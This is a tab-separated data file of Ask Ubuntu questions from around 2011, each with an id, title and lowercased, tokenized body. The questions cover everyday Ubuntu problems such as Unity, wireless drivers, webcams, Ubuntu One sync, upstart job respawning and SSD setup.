52161	pcretest seems to be gone from libpcre3 package	pcretest in 11.04 seems to be missing from libpcre packages and i ca n't seem to find where it went off to . i kind of love using it to test regular expressions . where did it go ?
52168	it is possible to port unity ?	i 've been a ubuntu user for long , but , because of the lack of software updates ( eclips since in 3.5 , and others ) , and because ubuntu ( in my point of view ) is becoming more and more resources hungry ( for my little netbook : s ) , i 've switched ( before 11.04 was released ) into arch linux and i 'm very very happy with it . but , since 11.04 is out , and i 've tested unity i have to say that i love it so much ! before that i was addicted to gnome 3 shell ( gnome-shell ) , but with the time i learned a little bit more about unity , and now i simply can not leave without that ^^ ( nice job for all the team btw ! ) so i have a few questions ( one related to my post little and another 2 ) : 1 - because of the ubuntu dependencies , it is possibile to port unity to a gnome3 based installation ? ( i have the time and ( if i 'm not wrong ) the knowledge to do the most part of the porting . but i do n't really know how to start since i never make a portage of an huge project as this one : s ... ) 2 - some ideas to improve unity that i ca n't make my self : s.. 2.1 - the name of the distro ( ubuntu ) appears on the top , so the users know that when they are in the desktop then can access into a hidden menu ( it can make it more beautiful too ) . 2.2 - like in osx , the menu in the bar always visible ( it 's better i think ) . so anyone can help me with that ? porting and changing this settings on my existing ubuntu 11.04 ? ps : i 'm not asking for anyone to work with me , just to tell me if it is possible a post for gnome3 and guide me to the right sources and if possible an example of a working shell to appear in the gdm selection : s thanks in advance for all your help , and sorry for my very bad english : s !
52170	liferea invisible after trying to start it	running latest ubuntu on a dell laptop . after clicking on liferea icon on left-side unity menu , icon starts to flash with background blinking in silver . after a few minutes silver background stops flashing , becomes permanent , but no liferea . ideas anyone ? cheers/m
52172	kubuntu corrupt screen after lid close/screensaver	i 've seen a few other q & as around this , but nothing that is exactly what i 'm experiencing . i have a new lenovo x220 which i 'm running the latest kubuntu on . if i close the lid when i open it i get , 9/10 times , a flickering screen which sometimes updates around where the mouse is currently pointing and sometimes draws the wrong thing ( i.e . it draws a program which is actually in the background ) normally i 've resorted to just rebooting if this is the case but i want to know if there is a better way of doing it ? display drivers ( lspci | grep vga ) : 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 )
52177	webcam worked yesterday , no more	along with the rest of the world , i joined google plus right after invitations became available last night . i was able to use my webcam for their hangouts , now i can not . when i checked lshw i ca n't find the webcam on the slot it was in last night . relevant system info : os : ubuntu 10.04 system model : dell inspiron 1525 lshw snippets : *-generic:2 unclaimed description : system peripheral product : xd-picture card controller vendor : ricoh co ltd physical id : 9.3 bus info : pci @ 0000:02:09.3 version : 12 width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list configuration : latency=64 resources : memory : fe3ff600-fe3ff6ff *-generic:3 unclaimed product : illegal vendor id vendor : illegal vendor id physical id : 9.4 bus info : pci @ 0000:02:09.4 version : ff width : 32 bits clock : 66mhz capabilities : bus_master vga_palette cap_list configuration : latency=255 maxlatency=255 mingnt=255 resources : memory : fe3ff700-fe3ff7ff
52179	how do i restart unity 2d	as per how do i restart unity ? but i guess unity -- replace would start the 3d variant .
52182	restrict lubuntu to suspend	please help . if you know the solution for ubuntu , i 'll try it . i have lenovo ideapad s10-3 ( intel-atom netbook ) . after installing lubuntu 11.04 i realized that the system does n't recover after suspend . it just hangs and i need to do hard reset . trying to implement various things did n't help so now i ask for a way to turn suspending off . to break is easier than to build = ) or change suspend to hibernation . so that closing the notebook would not lead to hard reset to me . thanks for help
52183	where is the save directory for screenshot ?	i was wondering what is the default saving directory for accessories > take screenshot ? i just took a screenshot and i am looking for where it is saved . thanks and regards !
52186	how to restore flash settings ?	recently i wanted to increase flash performance by installing the flash aid extension for firefox . this step has broken my flash , and now i ca n't watch youtube videos in full screen . i get a black screen after it was fine before . i did remove the ff extension and i did try to completely remove the ubuntu restricted extras , but it wo n't let me do so , how do i restore the flash settings and completely remove the settings so i can get back to the original settings ? note that if i try to remove ubuntu restricted extras , it does try to install kubuntu restricted extras , at the same step . thanks
52188	firefox starts with last session . how can i change that ?	firefox is curently starting with my last session . it 's getting annoying . how can i change this so that it start with the home page ?
52200	battery indicator shows wrong percentage	anyone have any idea what 's going on with the percentage ? ( i wish my laptop was that awesome ... )
52202	was tomboy removed from oneiric ?	today i installed oneiric for testing and it works just fine on my machine , without any crashes whatsoever . one thing that bothered me , however , is that tomboy seems to be missing . the note taking application used to be default for a long time and even features brilliant ubuntu one integration , which i use a lot . was this removed without further notice from the default installation ? if yes , why ? i never read anything about this on blogs or the planet .
52205	xrandr configuration in .bashrc not running until i open a terminal ?	i have the following in my .bashrc file ... # ~/.bashrc : executed by bash ( 1 ) for non-login shells . # see /usr/share/doc/bash/examples/startup-files ( in the package bash-doc ) # for examples # multi-monitor configuration xrandr -- output hdmi1 -- mode 1920x1080 -- pos 0x0 -- rotate normal -- output dp1 -- off -- output vga1 -- mode 1600x900 -- pos 1920x0 -- rotate normal when i login , my monitors are mirrored and are at a bad resolution , making me believe this did not run . however , the first time i open a terminal after logging in , my monitors adjust the proper resolution and extend properly . why does this .bashrc file seem to be running only after i open a terminal ? i was under the impression it runs when i login . how can i get it to do so ?
52206	what 's the best clipboard manager that does n't need the panel ?	i 'm looking for a clipboard manager that does n't need the panel to be useful . something that can be triggered another way . or ... if someone can provide an easy way to trigger the dropdown that would normally occur with a clipboard manager had if i did n't have the panel hidden .
52208	is banshee damaging my music files ?	i do n't know whether that 's true , but sometime from now ( maybe since i 've started using ubuntu 11.04 ) , my music files have started showing errors on the execution . basically , many .mp3 files i had are damaged and start the music twice , like : the music starts then 2 seconds later it restarts and continues playing . this errors appear when listening to the songs in any players , being from ubuntu , windows or ipod . is it possible that banshee is doing this ?
52212	what is the least insecure way to store a password that is used by a script ?	i have a bash script that automatically authenticates with a service using my username and password . the credentials are currently stored as plain text within the script . what precautions should i take to most securely store these credentials while still allowing the script access ? points of clarification : i understand that , if available , other methods of authentication should be used instead . i still want to know what to do in the case that password authentication is the only option . not storing the password at all is not an acceptable answer here . i am asking about the case in which the script must have unattended access to the password .
52213	failing to connect to apple time capsule	i have just installed 10.04 netbook remix i386 on my asus eee pc 901 and it 's failing to connect to my apple time capsule wireless network . it will connect ( and remain connected ) to other wireless networks but not my own home setup using the capsule . it sees the time capsule , accepts the login password but does n't actually connect . does anybody know what the problem might be ?
52214	external display is showing and reporting wrong resolutions	i 'm running 11.04 in dual-boot on my macbook pro ( 2010 ) . i 've got an external monitor connected which i 've configured through nvidia settings to be it 's own x display . when i open the nvidia settings app , it says my external display only supports 640x480 . and even if i tweak the resolution options in /etc/x11/xorg.conf to use a specific ( higher ) resolution , it seems to be ignored . my graphics card is an `` nvidia geforce gt 330m '' and i have the latest drivers installed . how do i get my external display to use its full capacity which is 1920x1080 ? another thing to note is that the external display is reporting to be 1680x1048 which is the size of my main laptop resolution . how do i get my external display to use 1920x1080 ?
52216	how do i get a canon pixma mx350 working on 64 bit ?	anybody successful on installing this printer on amd64 please ? canon supplies 32bit drivers -- as *.deb and also as source : http : //www.canon.com.au/en-au/for-you/printers/pixma-inkjet-printers/mx350 current compilation failed ... trying to install the i386 debian packages worked somehow ... as of 2011-11 there 's an awesome ppa repository : how can i install a canon driver ?
52221	no contact list in msn	since today i ca n't see my contact list en empathy im , using the msn protocol . i 've tried uninstalling , reinstalling , erasing all config files from my computer ( using ubuntu tweak and erasing the config files from my /home folder ) , but nothing solve the problem time ago people have the same problem , they 're solved it changing a line in a script , but that bug was solved in latest versions of empathy . i 've tried to change that script , using other lines . /usr/lib/pymodules/python2.6/papyon/service/description/singlesignon/requestmultiplesecuritytokens.py i 've changed the line contacts = ( `` contacts.msn.com '' , `` mbi '' ) by the older one : contacts = ( `` contacts.msn.com '' , '' ? fs=1 & id=24000 & kv=7 & rn=93s9swww & tw=0 & ver=2.1.6000.1 '' ) but this no fix the bug in advanced options i have this ( in empathy account options ) : server : messenger.hotmail.com port : 1863 how can i solve this ? please help
52223	firefox wo n't integrate with unity launcher	after a recent firefox upgrade , the integration with the unity launcher went pear-shaped . clicking on the firefox icon does not move focus to the running firefox , but starts another firefox instance / window . i tried removing it from the launcher and re-adding it but i could n't re-add it in any way except adding a firefox shortcut launcher to the desktop and adding that to the launcher , but the same problem persists where clicking on the icon just opens new firefox windows instead of bringing up the existing window . i 'm running ubuntu 11.04 64 bit with normal unity desktop . is there a way to reset the configuration of the launcher to work normally with firefox again ?
52224	unable to boot or install ubuntu on an alienware m17x r3 laptop	neither can i install ubuntu 11.04 64 bit nor can i just run the os from a usb drive . it just shows a blank screen when i try to run it , and when i try to install it , the screen just flickers with rainbow colours . i need some linux on it , what other distribution is known to work on these machines ? i would be most comfortable with ubuntu if there is a workaround .
52227	gimp ca n't render psd files properly	i 'm using gimp on ubuntu 10.04 . i 'm trying to open a psd file with layers , but it gets rendered all wrong . several colors and gradients show up as black in gimp instead . if i open the psd in irfanview with wine , it will render correctly , but i wo n't have access to layers . is there something i can do to have the psd file with layers render properly in gimp ? if not , is there some other program i can try to view the layers of a psd file ?
52228	audio cd 's auto-mount but data cd 's do n't	i was using my computer fine the other day to burn some iso images using brasso . today when i insert a data cd it does n't show up but audio cd 's are fine . i can find the dvd-rom using disk utility and mount it but it just makes it part of the file system . it mounts at /mnt/cdrom . the problem is when i mount it manually it does n't show up in the places menu and brasso does n't see it as a separate drive so i ca n't use it properly . can somebody help to lead me in the right direction with this problem ? thanks , rob .
52230	how do i extract a rpm file ?	i 've rpm file of which i want to examine its file contents . for .deb packages , i can use dpkg -x file.deb to extract it . what is the equivalent command for a .rpm file ? i 'm looking for a command-line application .
52232	disable compression for replaygain in banshee	in rhythmbox it 's possible to disable compression for replaygain by unchecking a box in the settings of its replaygain plugin . the option is described like the following : it provides configuration options for [ ... ] enabling or disabling compression in order to prevent clipping . i wonder if there is such an option in banshee ? i have checked in its menu and glanced under banshee in the dconf-editor without finding anything . the reason i 'm asking is after reading the following in the replaygain specification : the audiophile user will not want any compression or limiting on the signal . in this case the only option is to automatically and temporarily reduce the pre-amp gain below the user-selected setting for tracks where clipping would otherwise occur .
52238	wireless keeps cutting out every several minutes on a realtek rtl8187se	the internet keeps cutting out every several minutes , sometimes it lasts longer but it happens eventually . i can still use the internet if i disconnect from the menu and click connect again . any help would be appreciated : ) details of my wireless card : wireless card : 04:00.0 network controller : realtek semiconductor co. , ltd. rtl8187se wireless lan controller ( rev 22 ) i 'm just running a plain old fully up to date 64-bit ubuntu ( kernel 2.6.38-10-generic ) how the kernel recognises my wireless card : *-network description : wireless interface product : rtl8187se wireless lan controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:04:00.0 logical name : wlan0 version : 22 serial : 00:24:21 : cf:89 : f6 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=r8180 latency=0 multicast=yes wireless=802.11b/g resources : irq:17 ioport:3000 ( size=256 ) memory : fa000000-fa003fff *-network description : ethernet interface product : rtl8111/8168b pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:05:00.0 logical name : eth0 version : 03 serial : 00:03:0d : de:97 : eb size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full ip=192.168.1.67 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:43 ioport:4000 ( size=256 ) memory : f6000000-f6000fff memory : f4000000-f4003fff memory : f4020000-f403ffff i 'm just using standard network manager , not customised anything really..
52240	11.04 wo n't boot all the way - unusable	i 'm new to ubuntu/linux and need some trouble shooting help . i setup 11.04 with zoneminder , it worked great for a few weeks and now it seems to boot fine but i 'm unable to use anything . runs very slow and when i open applications or windows they are not working . eg . i open a terminal window and it 's just gray but never gets me to a prompt , firefox opens to a blank white window as does system monitor and everything else . is there a bootup `` safemode '' or `` restore point '' option ? ideas how to trouble shoot this ? thanks !
52243	what is apt-fast and should i use it ?	several times over the past couple years , i 've heard of people using apt-fast for updating and installing packages , but i 'm not really sure what it does . i think i 've traced its origin to this forum post , and it seems to be a script that speeds up apt-get operations . what exactly does the script do ? are there any potential downsides to using it ? if not , why is n't everyone using it ?
52245	changing the login screen design ?	how do i change how the login screen looks in ubuntu 11.04 ? i want to change both the background and the design of the grey rectangle ( where the login form is ) in the center . i 've found some sites explaining how do do it for 10.04 , but only for changing the background image .
52246	avant window navigator still starts at startup after i uninstalled	i have recently installed avant windows navigator for openbox and when i go to other gui interfaces like ubuntu classic or ubuntu it also starts so i uninstalled everything i installed to make it work in openbox sudo apt-get autoremove tint2 lxterminal xcompmgr nitrogen guake sudo apt-get autoremove openbox obconf libobparser21 openbox-xdgmenu openbox-themes \ libobrender21 obmenu lxappearance-obconf lxappearance lxterminal then went in to ubuntu software center and uninstalled avant window navigator . still the stubborn app keeps booting when i restart my system . since i have done this the system is very unstable . i 'm running ubuntu 11.04 32 bit if that helps . thanks in advance .
52250	how can i adjust the scroll sensitivity down ?	i have a wireless mouse , and the scroll sensitivity - especially in firefox - is set way too high . is there a simple way to decrease it ? right now , the slightest touch on the wheel jumps to the bottom of the page . it 's a microsoft wireless laser mouse 5000 if that makes a difference . ( i also have a wireless logitech mouse attached to the same system , and the scroll speed is fine - if it was n't for a bad button , i 'd be happy to keep it . )
52255	how to log out of ubuntu one application , log into different account ?	i accidentally created two ubuntu one accounts on two different computers . however , i can not log out of either account on the ubuntu one application , so i 'm stuck with two different ( non-syncing ! ) accounts . i have deleted one account , and now when i start up ubuntu one on that computer it says : file sync error . ( auth failed ( auth_failed ) ) the information could not be retrieved . maybe your internet connection is down ? '' how can i reconfigure the ubuntu one application on that computer to the right account ? any help is greatly appreciated ! : )
52258	how well are ssds supported ?	i 'm planning to buy an ssd ( corsair force series 60gb ) but have n't found any reassurance that it is `` safe '' to install ubuntu 11.04 on without commands or `` hacks '' . i want to install ubuntu on an ssd and do n't want to care about writing commands after the installation to fix trim support . my question is : can i install ubuntu 11.04+ on an ssd just like i do on an hdd and not have problems with trim and performance ? or does ubuntu not support trim without technical configuration ?
52260	is there any way to 'hook ' the messaging menu ?	i would like to write an application that receives a notification whenever the messaging menu is activated ( the blue envelope lights up ) and whenever it is deactivated ( the blue envelope returns to its default color ) . is there any way to get a notification for this ? i 'm not really concerned about programming language in this case - although c , python , or php would be preferred .
52268	microphone and headphones not working on a toshiba satellite l645d	i installed ubuntu 11.04 on my computer . first i installed 10.10 , then upgraded to 11.04 due to problems with the 11.04 iso . my sound card is a conexant smartaudio hd now my headphones and microphone wo n't work . how can i get them working again ?
52269	how to print a postscript file in evince using a brochure layout ?	i have an postscript output from a man page produced by man -t ssh > man_ssh.ps . it opens for viewing in evince document viewer . i want to print it on a printer that supports double-sided printing . so , i 'd like to print it in 'brochure ' mode - that is , when four pages of a document are printed on two sides single sheet , so when the sheets are folded in half all at once , the numeration of the pages of a document is like in a booklet . how can i print the document this way in evince ? upd : there is one more question , how to make man -t output comply to booklet page layout - that is , wider inner margins , making pages 'left ' and 'right ' ?
52270	wrong permissions on `` make install ''	when i compile and install tarballs using the usual ./configure , make , sudo make install , the files and directories created always have wrong permissions . in particular , nothing that should have the group and user execute bits actually has them . i 've been making do by tee-ing a copy of the make log and chmod-ing things as appropriate , but that 's gotten increasingly annoying . for example , i just tried to install the latest version of ocaml by its tarball using ./configure , make world , and sudo make install . the result is that every /usr/local/bin/ocaml* has permissions 0744 rather than 0755 as you 'd expect . subdirectories in /usr/local/lib/ocaml/ also have 0744 bits , preventing anyone who 's not root from using those libraries . umask 022 before make install in a root shell is fruitless , as well . furthermore , i have never had this problem with non-ubuntu distributions , for what that 's worth . like i said , this happens with all tarballs i use , so an answer like `` sudo apt-get install ocaml '' is missing the point . thanks .
52271	is it possible to install gnome3 in kubuntu 11.04	just wondering if it is possible to install gnome3 under kubuntu 11.04 ?
52272	recognize new harddisk after hibernate wakeup	i hibernated my computer ( suspend to disk ) and added a new sata disk . after resuming , my ubuntu 10.10 does not recognize the new disk ( while the bios did when starting up ) . how can i get my machine to recognize the new hard drive without rebooting ?
52274	how do i install ubuntu on an external hard disk ?	i install ubuntu on my hdd but can not use it on any computer installing ubuntu 11.04 or any other distribution on an external hard drive connected to a computer via usb is about the same as the method used to install it on an internal hard disk . your choice of external disk to use are many , but the one i used for this tutorial is a 2.5′ hard disk that i put in a similarly-sized hard disk enclosure . a 320 gb 2.5′ hard disk purchased for this tutorial cost us $ 45 . enclosures tend to be very cheap . the one i bought cost about us $ 7 . at 5′x2.75′ , the whole unit can fit comfortably in any pocket . you can use it to clone your ubuntu 11.04 installation that you carry along with you . and with the usb connection , you can use it on any computer that can boot off a usb device . extdisk
52275	intel pro/wireless 3945abg stopped working	my wlan works right after i installed ubuntu 11.04 , after several hours it just stop detecting my wlan . my wlan is an intel pro/wireless 3945abg [ golan } network connection ( rev 02 ) . i downloaded driver for linux from intel website but i do n't know how to install it . please help !
52279	smplayer not playing mp4 format	i am trying to run some mp4 videos on smplayer , but the player is only playing the audio , and no video is visible . the same file i open in vlc player is showing video + audio . i like smplayer , as its better in usability , therefore looking for the solution of playing mp4 files in it . thanks
52280	nautilus advanced features	i 'm using nautilus as file manager for local and remote ftp files . i 'm interested in some advanced features and how they can be achieved . default extra pane . synchronised browsing between two panes . copy file from one pane to another with keyboard shortcut . ignore .svn files while copying entire folders .
52283	accessing hidden folders from a live cd	i 'm having issues with backing up hidden folders from an ubuntu installation . my kids pc motherboard recently died . i 've built them a new system , but it 's a different processor/architecture , so the old hard drive does n't boot in the new system . i can access the drive by booting to a live cd , and get all the regular files . i do n't seem to be able to access the hidden files to back them up . i 'm sure i 've done this in the past with other disks and had no issues with accessing all files . i 've checked the disk itself and it reports no errors . i can see the folder names , but when i try to browse into them , or copy their contents , i get an error like this : the folder contents could not be displayed . you do not have the permissions necessary to view the contents of `` .worldofgoo '' . i know all the user names and passwords for the various users . none of the folders were encrypted or protected in any way . file system is ext4 does anyone have any idea how i can i back these folders up before re-installation ?
52284	cant receive external mail on my ubuntu 10.10 64bit server	i 've setup my server using the tutorial found here : http : //www.howtoforge.com/perfect-server-ubuntu-10.10-maverick-meerkat-ispconfig-3 everything is up and running but i ca n't get my external mail to work ... i can send external mail but can not receive it . any help much appreciated .
52286	how do i symlink certain directories in /home to an ssd ?	in is a 40gb ssd practical to use for ' / ' jorge describes how he symlinks things in his /home that would benefit from being on an ssd . how is this done ? i 've figured that i need to do the following : create a directory on the ssd to hold what i want to link from /home , e.g . mkdir /var/jorge . move the things from /home that should be on the ssd , e.g . mv /home/jorge/.config /var/jorge . create the symlinks , e.g . ln -s /var/jorge/.config /home/jorge/.config . is this the correct way to proceed ? do i need to do it from a live cd ?
52288	what in /home would benefit from being on an ssd ?	in is a 40gb ssd practical to use for ' / ' jorge describes how he symlinks directories in his /home that would benefit from being on an ssd . the directories he names are ~/.cache ~/.config ~/.gconf i know how to make the symlinks . what i am asking for is if this is a good list of directories in /home that benefits from being on an ssd ? i figure that good items on such a list are files that are read often . the reason for asking this is that i can not fit all of /home on the ssd but i still want to get as much performance out of the ssd as possible .
52298	networkmanager in kubuntu does not show dsl connection !	i have a dial-up connection for the internet which works perfectly well in gnome using dsl settings in which i provide username , password , ip , gateway , netmask etc . but in kde i can not do anything . after having provided the necessary information i do n't see any available connection of dsl in the system tray . i have provided tow screenshot to show what is happening . the wired connection is shown . but for dsl there is no such thing that i could click on to start using the web . you can see that there is a connection under the dsl tab but it is not available at the tray . is it this bug : bug # 447241 ? ? it was reported in 2009 . now it is 2011 . after several releases of kubuntu the bug should be fixed by now . my question is how can i bring the dsl connection in the tray and solve the issue ? /please do n't suggest to install other network management tool because to solve the issue of internet connection , i need an internet connection to install other package rendering me in a recursive loop . and please do n't suggest pppoeconf . it makes the wired connection unavailabe . if cli works then why this gui./
52305	where to find home directory when ubuntu installed with wubi	ive installed ubuntu-32bit on windows7-32bit with wubi . before that i had only ubuntu on my hard disk . it seems like my `` home '' -folder is the same as my windows home folder . do i put config files in there ? it seems like the directory structure is different than i had before when i only had ubuntu os on my hard disk . thanks for advice !
52309	`` respawning too fast , stopped '' . how to make upstart disable for 5 mins ?	in the old days , the init daemon used to disable tasks that were respawning too fast . i discovered to my peril that upstart just stops them . forever . i have found the count and interval controls for when to stop a job that is respawning fast , but i can not find how to restart that job after a specified waiting time . this is for a remote server that must connect via ssh in order for me to tunnel back into it . but it regularly has connection problems and the job that runs the ssh connection is dying ! i foolishly expected upstart to keep the job running . is there a way , or do i need to do something like run a cron job to check if it is running and if not restart it ?
52315	configuring sks to sync with other keyservers	is there a procedure that needs to be followed in order to get an sks keyserver to sync with other keyservers ( specifically , ubuntu 's keyservers ) ? if so , what is that process ?
52318	what kind of support or performance can i expect from ubuntu on a chromebook ?	has anyone installed a ubuntu on a chromebook ( acer or samsung ) yet ? what has been the experience so far ? what kind of hardware support is there ? are you getting expected performance ?
52327	how can i install my xbox 360 wired controller ?	i have tried the install instructions https : //help.ubuntu.com/community/xbox360controller but i keep getting an error message at the point when i 'm executing the make file . warlord @ warlord-laptop : ~/xpad $ make make modules -c /usr/src/linux-headers-2.6.32-32-generic subdirs=/home/warlord/xpad make [ 1 ] : entering directory `/usr/src/linux-headers-2.6.32-32-generic' cc [ m ] /home/warlord/xpad/xpad.o /home/warlord/xpad/xpad.c : in function ‘xpad_wireless_connect’ : /home/warlord/xpad/xpad.c:291 : error : implicit declaration of function ‘info’ /home/warlord/xpad/xpad.c : in function ‘xpad_open’ : /home/warlord/xpad/xpad.c:382 : error : ‘struct input_dev’ has no member named ‘private’ /home/warlord/xpad/xpad.c : in function ‘xpad_close’ : /home/warlord/xpad/xpad.c:408 : error : ‘struct input_dev’ has no member named ‘private’ /home/warlord/xpad/xpad.c : in function ‘xpad_probe’ : /home/warlord/xpad/xpad.c:496 : error : ‘struct input_dev’ has no member named ‘cdev’ /home/warlord/xpad/xpad.c:497 : error : ‘struct input_dev’ has no member named ‘private’ make [ 2 ] : *** [ /home/warlord/xpad/xpad.o ] error 1 make [ 1 ] : *** [ _module_/home/warlord/xpad ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-2.6.32-32-generic' make : *** [ all ] error 2 why is this happening ? i 've also tried xboxdrv , and the jscalibrator is no longer supported in ubuntu 10.04 lts . and i also used lsinput and it shows my gamepad correctly in event 10 but not in js0 or js1 . /dev/input/event10 bustype : bus_usb vendor : 0x45e product : 0x28e version : 276 name : `` microsoft x-box 360 pad '' phys : `` usb-0000:00:1d.2-1/input0 '' bits ev : ev_syn ev_key ev_abs ev_ff
52328	mount virtualbox sharedfolder in ubuntu vm on boot	i have a ubuntu vm running in virtualbox . i have a shared folder set up as myshare i have a folder created in my home directory ( ~/jamesw ) as host . using the line sudo mount -t vboxsf myshare host from my home directory in terminal mounts the drive correctly , but if i reboot it is not mounted again . this is a vm i use for running a simple web server and i would like this share mounted each time i boot . is there any way to do this ? especially given that it requires sudo ?
52332	upgrading from 10.04 to 11.04	i want to upgrade ubuntu 10.04 to 11.04 offline . i have burnt a ubuntu 11.04 cd . during the installation there 's an option ; `` upgrade to 11.04 '' . will choosing this option affect my windows partition ? i do n't want my windows partition to be affected .
52333	file access : open fails for one program but not another	this is the most unusual thing . i 'm trying to start up mysqld with a different my.cnf ( so i can have two mysql daemons running without conflict ) . the file is /etc/mysql/my2.cnf but mysql wo n't open it . when i run this command : sudo -u mysql strace /usr/sbin/mysqld -- defaults-file=/etc/mysql/my2.cnf i see this in the output : stat ( `` /etc/mysql/my2.cnf '' , { st_mode=s_ifreg|0644 , st_size=3574 , ... } ) = 0 open ( `` /etc/mysql/my2.cnf '' , o_rdonly ) = -1 eacces ( permission denied ) however , when i change the command to : sudo -u mysql strace cat /etc/mysql/my2.cnf > /dev/null i see this in the output : fstat ( 1 , { st_mode=s_ifchr|0666 , st_rdev=makedev ( 1 , 3 ) , ... } ) = 0 open ( `` /etc/mysql/my2.cnf '' , o_rdonly ) = 3 same user - same kernel call - different results ! i checked file permissions - and extended permissions : # ls -l $ pwd/my2.cnf -rw-r -- r -- 1 root root 3574 2011-07-08 10:04 /etc/mysql/my2.cnf # lsattr $ pwd/my2.cnf -- -- -- -- -- -- -- -- -e- /etc/mysql/my2.cnf am i getting bit by some part of apparmour or selinux ? i did n't see anything like that in the logs ( including daemon.log , syslog , or messages ) . how do i fix this problem ?
52341	how to kill wine processes when they crash or are going to crash ?	sometimes it happens that a wine application crashes ( slowing down the system and making it almost unusable ) . in most cases i 'm able to kill the program with xkill , but sometime i 've to restart as ubuntu seems not to respond very well ( the only thing that works is alt+f2 , the launcher ; xkill does n't ) . i 've tried to use wineboot -r or -f but they do n't seem to work very well.. if something is unclear , let me know i 'll try to explain better : )
52349	i have a problem with wine `` path not found '' when i trying to run install.exe	`` path not found '' when i trying to run install.exe im try to rm .wine and run winecfg but not can n't solves this problem .
52350	keep numlock status while using kvm	i recently purchased and started using a kvm . most things work as i expect them , but when i switch back to my main [ ubuntu 10.04 ] desktop , numlock gets turned off . i suspect that it looks to the computer like the keyboard is just plugged in . however , the functionlock key does n't get switched . ( the keyboard is a split keyboard with a functionlock feature that allows the f1 to f12 keys for other purposes ) . how can i tell ubuntu to keep my numlock status ? or , tell it to always switch to numlock is on whenever a new keyboard is plugged in ( which is what i suspect the computer thinks is happening when i switch the kvm to it ) ? ~edit~ at william 's suggestion ( see below ) , i installed gconf-editor and looked at the keyboard settings . on the computer that has the behavior i want ( numlock on by default ) , there is a numlock_on setting under /desktop/gnome/peripherals/keyboard/host-desktop1/0/numlock_on ( perhaps important to note , the numlock_on is the only key in the folder , and it does n't have any of the key documentation set . however , on the other computer ( where it is not working ) , that setting is absent . according to how do i use the gconf editor ? , gconf is used for storing application settings , and not particularly intended for settings stuff . so , twofold remaining question : is that the setting i need ? ( i suspect the answer is yes , and i 'd be happy to test that theory ) how do i set it ?
52351	nautilus becomes unresponsive , dmesg reports : `` valid ecryptfs headers not found ... ''	the other day i was installing some stuff via software center , when suddenly nautilus becomes unresponsive to the point where it just hangs until i restart . now whenever i boot , nautilus will work fine for 10 seconds then become unresponsive . i checked dmesg and it 's filled with this : [ 385.392295 ] valid ecryptfs headers not found in file header region or xattr region [ 385.392304 ] either the lower file is not in a valid ecryptfs format , or the key could not be retrieved . plaintext passthrough mode is not enabled ; returning -eio i found a few bug reports , with no solution . i 'm not even sure if that 's causing it but seems to be the issue . would n't be so bad if ubuntu one worked , but it refuses to sync now . any ideas ? i setup encryption on this drive during install . i should mention if i do gksudo nautilus . in the command line it works fine
52354	why do i keep getting monthly charges after cancelling ?	i cancelled my ubuntuone acct on may 11 , 2011 but i 've continued to be charged $ 3.99 in both june and july ? how do i stop this and how do i get my $ 8 back ? ?
52355	why does giggle ignore more than .gitignore ?	this is a question about why giggle acts in a certain way . reproduce to reproduce what my question is about you need to have git and giggle installed . step 4–10 is not necessary to reproduce . i added them to illustrate git workflow . mkdir test – make a directory for testing . cd test git init – initialize a git project . echo -e '/*\n ! *.tex ' > .gitignore – create a .gitignore file . echo -e `` test '' > test.tex – write something to test.tex . git add . git commit -m `` first commit '' – commit what 's written to test.tex . echo -e `` \test '' > > test.tex – write something more to test.tex . git add . git commit -m `` second commit '' – commit what 's written to test.tex . check the project in giggle . there is no file to be viewed in the project : rm .gitignore update the project in giggle ( ctrl+r ) . now the file can viewed : my question why ca n't the files be viewed when the .gitignore file is there ( step 11 ) ? it should not be due to the .gitignore file . the content of the .gitignore file is : /* ! *.tex the first line means ignore all . the second line means do n't ignore all .tex files . so test.tex should not be ignored . man gitignore says an optional prefix ! which negates the pattern ; any matching file excluded by a previous pattern will become included again .
52357	uvc webcam upside down with google+ gtalk plugin	i 've got google talk plugin installed and by default , my uvc webcam is upside down on google+ hangout video chat . how can i flip it over ? i tried this and it did n't work : ld_preload=/usr/lib/libv4l/v4l1compat.so /opt/google/talkplugin/googletalkplugin google-chrome this ld_preload trick works fine on skype . cheese works well by default , probably because it 's using v4l2 .
52361	connection adsl pppoe + 108m wireless access point tp-link	in window is simple : 1 ) i create a a new connection ( rds ) as pppoe and configure with username and password . 2 ) i have a wireless access point tp-link i plug my cable and my laptop is connected on wireless 3 ) to make the connection available i simple click on connection rds ( i am connected to wireless ) and everything is ok. how to make this connection work on ubuntu ? i make a new connection with my username and password and named it rds and i am connected to my wireless access point but how to make my internet to work ?
52367	is ubuntu one ignoring particular directory names ?	under `` ubuntu one '' in my home directory ( using 11.04 ) i have a directory `` daily '' and under that 7 more directories whose names are the days of the week . a daily cron job gathers a few important files and puts them in the proper subdirectory so that i have backups for the most recent 7 days . works fine . when i log on to one.ubuntu.com/files , all the directories and most of the files are there , but the files under daily/wednesday and daily/thursday are missing . i 've tried waiting . several days . the wednesday and thursday files that i can see locally does not get uploaded . i 've tried disconnecting and reconnecting ubuntu one in the ubuntu one control panel . does not help . if i create an empty file under daily/friday , it gets uploaded within seconds . doing the same under daily/wednesday has no effect . i 've checked that the file and group owner and protection bits are the same for all files . file sizes are also similar for all directories . the total size of all files is less than 100mb , so should fit within the 2gb limit . what more can i try ?
52374	how to bridge network ubuntu server ?	i am an ubuntu server user . i have two ethernet cards which i want to use as eth0 ( wan ) and eth1 ( lan ) . however , i have three gateways , each with a different subnet . like this : 192.168.20.12 52.100.50.10 10.10.1.3 i want to marge these three ips on eth0 ( wan ) and how to set my eth1 ( lan ) gateway ? i want this for my office because of if one or two gateways are down another is on so i never disconnect from internet . im not understanding bridge-utils . i want details example about this that how its work ? please help ! !
